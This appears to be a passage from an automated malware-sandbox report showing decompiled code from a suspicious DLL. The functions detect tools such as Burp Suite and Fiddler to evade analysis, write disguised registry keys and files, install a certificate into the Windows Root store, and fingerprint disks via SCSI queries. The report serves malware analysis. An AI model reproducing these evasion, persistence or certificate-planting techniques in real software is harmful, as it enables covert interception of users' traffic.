                                                                                                                                                      								if(_t42 == 0) {
                                                                                                                                                      									_t43 = E1000CAC0( &_v268);
                                                                                                                                                      									_t97 = _t96 + 4;
                                                                                                                                                      									__eflags = _t43;
                                                                                                                                                      									if(__eflags <= 0) {
                                                                                                                                                      										L20:
                                                                                                                                                      										_t45 = E1000CAC0( &_v268);
                                                                                                                                                      										_t98 = _t97 + 4;
                                                                                                                                                      										__eflags = _t45;
                                                                                                                                                      										if(__eflags <= 0) {
                                                                                                                                                      											L23:
                                                                                                                                                      											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
                                                                                                                                                      											_t99 = _t98 + 8;
                                                                                                                                                      											__eflags = _t46;
                                                                                                                                                      											if(_t46 == 0) {
                                                                                                                                                      												goto L30;
                                                                                                                                                      											}
                                                                                                                                                      											_t48 = E1000CAC0( &_v268);
                                                                                                                                                      											_t100 = _t99 + 4;
                                                                                                                                                      											__eflags = _t48;
                                                                                                                                                      											if(__eflags <= 0) {
                                                                                                                                                      												L27:
                                                                                                                                                      												__eflags = E1000CAC0( &_v268);
                                                                                                                                                      												if(__eflags <= 0) {
                                                                                                                                                      													goto L30;
                                                                                                                                                      												}
                                                                                                                                                      												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
                                                                                                                                                      												__eflags = _t51;
                                                                                                                                                      												if(_t51 == 0) {
                                                                                                                                                      													goto L30;
                                                                                                                                                      												}
                                                                                                                                                      												 *0x10333dcc = 1;
                                                                                                                                                      												return 0;
                                                                                                                                                      											}
                                                                                                                                                      											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
                                                                                                                                                      											_t100 = _t100 + 8;
                                                                                                                                                      											__eflags = _t53;
                                                                                                                                                      											if(_t53 == 0) {
                                                                                                                                                      												goto L27;
                                                                                                                                                      											}
                                                                                                                                                      											 *0x10333dcc = 1;
                                                                                                                                                      											return 0;
                                                                                                                                                      										}
                                                                                                                                                      										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
                                                                                                                                                      										_t98 = _t98 + 8;
                                                                                                                                                      										__eflags = _t55;
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											goto L23;
                                                                                                                                                      										}
                                                                                                                                                      										 *0x10333dcc = 1;
                                                                                                                                                      										return 0;
                                                                                                                                                      									}
                                                                                                                                                      									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
                                                                                                                                                      									_t97 = _t97 + 8;
                                                                                                                                                      									__eflags = _t57;
                                                                                                                                                      									if(_t57 == 0) {
                                                                                                                                                      										goto L20;
                                                                                                                                                      									}
                                                                                                                                                      									 *0x10333dcc = 1;
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = E1000CAC0( &_v268);
                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                      									L16:
                                                                                                                                                      									goto L30;
                                                                                                                                                      								}
                                                                                                                                                      								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
                                                                                                                                                      								__eflags = _t61;
                                                                                                                                                      								if(_t61 == 0) {
                                                                                                                                                      									goto L16;
                                                                                                                                                      								}
                                                                                                                                                      								 *0x10333dcc = 1;
                                                                                                                                                      								return 0;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x10333dcc = 1;
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						 *0x10333dcc = 1;
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					 *0x10333dcc = 1;
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t66 = E1000CAC0( &_v268);
                                                                                                                                                      				_t110 = _t66;
                                                                                                                                                      				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
                                                                                                                                                      					goto L30;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *0x10333dcc = 1;
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}



































                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100193EE
                                                                                                                                                      • _memset.LIBCMT ref: 1001940B
                                                                                                                                                      • GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
                                                                                                                                                      • GetWindowTextA.USER32 ref: 10019439
                                                                                                                                                      • _strlen.LIBCMT ref: 10019446
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
                                                                                                                                                      • _strlen.LIBCMT ref: 10019475
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                      • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                      • API String ID: 1565133231-1140939848
                                                                                                                                                      • Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
                                                                                                                                                      • Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				char _v267;
                                                                                                                                                      				char _v268;
                                                                                                                                                      				char _v531;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				char _v536;
                                                                                                                                                      				char _v803;
                                                                                                                                                      				char _v804;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      
                                                                                                                                                      				_t94 = __eflags;
                                                                                                                                                      				_t77 = __edi;
                                                                                                                                                      				_v536 = 0;
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                      				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
                                                                                                                                                      				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
                                                                                                                                                      				_v804 = 0;
                                                                                                                                                      				E1000CF20(_t77,  &_v803, 0, 0x103);
                                                                                                                                                      				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
                                                                                                                                                      				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
                                                                                                                                                      				_v268 = 0;
                                                                                                                                                      				E1000CF20(_t77,  &_v267, 0, 0x103);
                                                                                                                                                      				E1001F990(__ebx, _t77, __esi, _t94,  &_v268);
                                                                                                                                                      				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
                                                                                                                                                      				_t95 = _t44;
                                                                                                                                                      				if(_t44 != 0) {
                                                                                                                                                      					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
                                                                                                                                                      					_t96 = _t46;
                                                                                                                                                      					if(_t46 != 0) {
                                                                                                                                                      						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8);
                                                                                                                                                      						_t97 = _t48;
                                                                                                                                                      						if(_t48 != 0) {
                                                                                                                                                      							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
                                                                                                                                                      							_t98 = _t50;
                                                                                                                                                      							if(_t50 != 0) {
                                                                                                                                                      								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
                                                                                                                                                      								_t99 = _t52;
                                                                                                                                                      								if(_t52 != 0 && E1001F5F0(_a4, _t99,  &_v804, _a4, _a8) != 0) {
                                                                                                                                                      									_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8);
                                                                                                                                                      									_t101 = _t55;
                                                                                                                                                      									if(_t55 != 0 && E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
                                                                                                                                                      										_v536 = 1;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v536;
                                                                                                                                                      			}


















                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                        • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                        • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                        • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                        • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                        • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                      • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                      • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                      • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                      • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                      • API String ID: 475603772-4188859120
                                                                                                                                                      • Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                      • Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char* _v16;
                                                                                                                                                      				char* _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				char _v32;
                                                                                                                                                      				char _v35;
                                                                                                                                                      				char _v39;
                                                                                                                                                      				char _v43;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t120;
                                                                                                                                                      				void* _t140;
                                                                                                                                                      				void* _t141;
                                                                                                                                                      				void* _t191;
                                                                                                                                                      				void* _t192;
                                                                                                                                                      				void* _t193;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t195;
                                                                                                                                                      				void* _t196;
                                                                                                                                                      
                                                                                                                                                      				_t192 = __esi;
                                                                                                                                                      				_t191 = __edi;
                                                                                                                                                      				_t141 = __ebx;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v20 = "https://";
                                                                                                                                                      				_v16 = "http://";
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v43 = 0;
                                                                                                                                                      				_v39 = 0;
                                                                                                                                                      				_v35 = 0;
                                                                                                                                                      				_t86 = E10001A50(_a4, _v20);
                                                                                                                                                      				_t194 = _t193 + 8;
                                                                                                                                                      				if(_t86 != 0) {
                                                                                                                                                      					L2:
                                                                                                                                                      					_v8 = _a4;
                                                                                                                                                      					_t88 = E10001A50(_a4, _v20);
                                                                                                                                                      					_t195 = _t194 + 8;
                                                                                                                                                      					if(_t88 == 0) {
                                                                                                                                                      						 *_a8 = 0;
                                                                                                                                                      						_v8 = _v8 + 7;
                                                                                                                                                      						 *_a20 = 0x50;
                                                                                                                                                      					} else {
                                                                                                                                                      						 *_a8 = 1;
                                                                                                                                                      						_v8 = _v8 + 8;
                                                                                                                                                      						 *_a20 = 0x1bb;
                                                                                                                                                      					}
                                                                                                                                                      					_t91 = E10001A50(_v8, "/");
                                                                                                                                                      					_t196 = _t195 + 8;
                                                                                                                                                      					_v28 = _t91;
                                                                                                                                                      					if(_v28 == 0) {
                                                                                                                                                      						_t92 = E1000CAC0(_v8);
                                                                                                                                                      						_t196 = _t196 + 4;
                                                                                                                                                      						_v24 = _t92 + 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v24 = _v28 - _v8 + 1;
                                                                                                                                                      					}
                                                                                                                                                      					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                      					E1000CF20(_t191,  *_a12, 0, _v24);
                                                                                                                                                      					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
                                                                                                                                                      					_v28 = E10001A50(_v8, "/");
                                                                                                                                                      					if(_v28 == 0) {
                                                                                                                                                      						_v24 = 2;
                                                                                                                                                      						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                      						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                      						E1000E280( *_a24, "/");
                                                                                                                                                      					} else {
                                                                                                                                                      						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
                                                                                                                                                      						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
                                                                                                                                                      						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                      						E1000E280( *_a24, _v28);
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = E10001A50( *_a12, ":");
                                                                                                                                                      					if(_v8 == 0) {
                                                                                                                                                      						_t181 = _a12;
                                                                                                                                                      						_v24 = E1000CAC0( *_a12) + 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v24 = _v8 -  *_a12 + 1;
                                                                                                                                                      						_t120 = E1000CAC0( *_a12);
                                                                                                                                                      						_t181 =  &_v44;
                                                                                                                                                      						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
                                                                                                                                                      						E1000E5E5( &_v44, "%d", _a20);
                                                                                                                                                      					}
                                                                                                                                                      					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
                                                                                                                                                      					E1000CF20(_t191,  *_a16, 0, _v24);
                                                                                                                                                      					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
                                                                                                                                                      					_v32 = 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t140 = E10001A50(_a4, _v16);
                                                                                                                                                      					_t194 = _t194 + 8;
                                                                                                                                                      					if(_t140 != 0) {
                                                                                                                                                      						goto L2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v32;
                                                                                                                                                      			}




























                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3056589307-0
                                                                                                                                                      • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                      • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E1001D560(void* __edi, char* _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				struct _OVERLAPPED* _v20;
                                                                                                                                                      				struct _OVERLAPPED* _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				short _v548;
                                                                                                                                                      				char _v1010;
                                                                                                                                                      				char _v1068;
                                                                                                                                                      				char _v1070;
                                                                                                                                                      				intOrPtr _v1084;
                                                                                                                                                      				intOrPtr _v1092;
                                                                                                                                                      				intOrPtr _v1096;
                                                                                                                                                      				intOrPtr _v1100;
                                                                                                                                                      				intOrPtr _v1104;
                                                                                                                                                      				void _v1108;
                                                                                                                                                      				char _v2132;
                                                                                                                                                      				struct _OVERLAPPED* _v2136;
                                                                                                                                                      				char _v2137;
                                                                                                                                                      				long _v2144;
                                                                                                                                                      				struct _OVERLAPPED* _v2148;
                                                                                                                                                      				intOrPtr _v2152;
                                                                                                                                                      				char* _v2156;
                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                      				intOrPtr _t96;
                                                                                                                                                      				void* _t125;
                                                                                                                                                      				void* _t126;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t125 = __edi;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v2136 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
                                                                                                                                                      					_t127 = _t127 + 0xc;
                                                                                                                                                      					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                      					if(_v32 != 0xffffffff) {
                                                                                                                                                      						_v12 = 0;
                                                                                                                                                      						while(1 != 0) {
                                                                                                                                                      							E1000CF20(_t125,  &_v1108, 0, 0x22d);
                                                                                                                                                      							_t127 = _t127 + 0xc;
                                                                                                                                                      							_v1104 = 0x49534353;
                                                                                                                                                      							_v1100 = 0x4b534944;
                                                                                                                                                      							_v1068 = _v12;
                                                                                                                                                      							_v1108 = 0x1c;
                                                                                                                                                      							_v1096 = 0x2710;
                                                                                                                                                      							_v1084 = 0x211;
                                                                                                                                                      							_v1092 = 0x1b0501;
                                                                                                                                                      							_v1070 = 0xec;
                                                                                                                                                      							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
                                                                                                                                                      								L20:
                                                                                                                                                      								if(_v2136 != 0) {
                                                                                                                                                      									L23:
                                                                                                                                                      								} else {
                                                                                                                                                      									_v12 =  &(_v12->Internal);
                                                                                                                                                      									if(_v12 < 2) {
                                                                                                                                                      										goto L23;
                                                                                                                                                      									} else {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_v16 = 0;
                                                                                                                                                      								do {
                                                                                                                                                      									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                      									_v16 = _v16 + 1;
                                                                                                                                                      								} while (_v16 < 0x100);
                                                                                                                                                      								_t91 = E1001CD70( &_v2132);
                                                                                                                                                      								_t127 = _t127 + 4;
                                                                                                                                                      								_v28 = _t91;
                                                                                                                                                      								_v2148 = 0;
                                                                                                                                                      								_v8 = 0x104;
                                                                                                                                                      								_v2156 = _a4;
                                                                                                                                                      								_v2152 = _v28 - _a4;
                                                                                                                                                      								while(_v8 != 0x80000106) {
                                                                                                                                                      									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                      									if(_v2137 != 0) {
                                                                                                                                                      										 *_v2156 = _v2137;
                                                                                                                                                      										_v2156 = _v2156 + 1;
                                                                                                                                                      										_t96 = _v8 - 1;
                                                                                                                                                      										_v8 = _t96;
                                                                                                                                                      										if(_t96 != 0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      											L17:
                                                                                                                                                      											_v2156 = _v2156 - 1;
                                                                                                                                                      											_v2148 = 0x8007007a;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									L18:
                                                                                                                                                      									 *_v2156 = 0;
                                                                                                                                                      									if(_v2148 < 0) {
                                                                                                                                                      										goto L20;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L24;
                                                                                                                                                      									}
                                                                                                                                                      									goto L25;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                      									goto L17;
                                                                                                                                                      								} else {
                                                                                                                                                      								}
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							L25:
                                                                                                                                                      							CloseHandle(_v32);
                                                                                                                                                      							_v20 = _v24;
                                                                                                                                                      							goto L26;
                                                                                                                                                      						}
                                                                                                                                                      						L24:
                                                                                                                                                      						_v2136 = 1;
                                                                                                                                                      						goto L25;
                                                                                                                                                      					}
                                                                                                                                                      					L26:
                                                                                                                                                      					_v20 =  &(_v20->Internal);
                                                                                                                                                      					_v24 = _v20;
                                                                                                                                                      				} while (_v20 < 0x10);
                                                                                                                                                      				return _v2136;
                                                                                                                                                      			}
































                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d73d
                                                                                                                                                      0x1001d79e
                                                                                                                                                      0x1001d7a2
                                                                                                                                                      0x1001d7ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d7ab
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x1001d7ae
                                                                                                                                                      0x1001d7b4
                                                                                                                                                      0x1001d7ba
                                                                                                                                                      0x1001d7bd
                                                                                                                                                      0x1001d7d0

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                      • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D660
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001D7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                      • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                      • API String ID: 3873020565-153650326
                                                                                                                                                      • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                      • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                      			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				char _v100;
                                                                                                                                                      				char _v128;
                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                      				char _v160;
                                                                                                                                                      				char _v188;
                                                                                                                                                      				signed int _v192;
                                                                                                                                                      				intOrPtr _v196;
                                                                                                                                                      				intOrPtr _v200;
                                                                                                                                                      				intOrPtr _v204;
                                                                                                                                                      				intOrPtr _v208;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr _t119;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t127 = __eflags;
                                                                                                                                                      				_t118 = __esi;
                                                                                                                                                      				_t117 = __edi;
                                                                                                                                                      				_t87 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022C17);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t119;
                                                                                                                                                      				_v192 = 0;
                                                                                                                                                      				_push(_a12);
